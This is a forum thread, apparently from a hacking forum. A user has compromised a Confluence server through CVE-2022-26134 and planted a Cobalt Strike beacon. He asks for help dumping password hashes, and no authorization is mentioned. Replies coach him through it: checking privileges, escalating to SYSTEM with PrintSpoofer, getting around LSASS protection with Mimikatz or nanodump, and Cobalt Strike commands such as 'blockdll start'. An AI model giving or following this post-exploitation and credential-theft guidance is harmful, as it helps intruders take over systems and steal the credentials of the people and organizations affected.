PrivEsc Issue getting hashes

wiseguy01 · 23.06.2022

Hello,

I recently found a device vulnerable to CVE-2022-26134(Confluence) and I use powershell base64 to get reverse shell and loaded Cobalt beacon(one liner) on it. When I try to dump hashes with cobalt I get error ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005).
I tried dumping lsass.exe and got no where.
Please tell me your ideas?

Thanks,
WG01

zuna34 · 23.06.2022

wiseguy01 сказал(а):

(0x00000005)

error 5 = access denied

RocketRacoon · 23.06.2022

if you are nt/authority why dont just create users with admin or domain rights?

wiseguy01 · 24.06.2022

I tried creating with reverse shell but it doesn't work.

r1z · 25.06.2022

use webshell --> powershell.

wiseguy01 сказал(а):

I tried creating with reverse shell but it doesn't work.

seidziwhitehat · 27.06.2022

wiseguy01 сказал(а):

Hello,

I recently found a device vulnerable to CVE-2022-26134(Confluence) and I use powershell base64 to get reverse shell and loaded Cobalt beacon(one liner) on it. When I try to dump hashes with cobalt I get error ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005).
I tried dumping lsass.exe and got no where.
Please tell me your ideas?

Thanks,
WG01

Looks like RunAsPPL is enabled on the server, try to use a few Mimikatz techniques to bypass this feature. Google is your friend here.
Also, some av software can be involved when you see such error. You should probably perform a basic system recon before hashdump.

zuna34 · 27.06.2022

the confluence runs as nt\auth networkservice, not system. you need system, to dump hashes, which explains the error that mimik can't get handle on lsass (0x00000005) (error 5 = access denied) execute whoami /priv. you will see that SeImpersonatePrivilege is enabled. Just use https://github.com/crisprss/PrintSpoofer to get to system, then even if PPL is enabled, you can use nanodamp.

wiseguy01 · 27.06.2022

zuna34 thank you very much but nanodump gave error [-] Could not connect to pipe: 2

r1z · 27.06.2022

wiseguy01 сказал(а):

zuna34 thank you very much but nanodump gave error [-] Could not connect to pipe: 2

You may need to inject your beacon with authorized process to make nanodump works, simple bypass the DLLblocks by running this command before dumping nano.

Код:

blockdll start

then

Код:

nanodump

wiseguy01 · 27.06.2022

Still get error [-] A privilege is missing: SeDebugPrivilege. Are you elevated?

wiseguy01 · 28.06.2022

thank you r1z for helping me!

PrivEsc Issue getting hashes

wiseguy01

ripper

zuna34

HDD-drive

RocketRacoon

RAM

wiseguy01

ripper

r1z

Still(In)Secure

seidziwhitehat

RAID-массив

zuna34

HDD-drive

wiseguy01

ripper

r1z

Still(In)Secure

wiseguy01

ripper

wiseguy01

ripper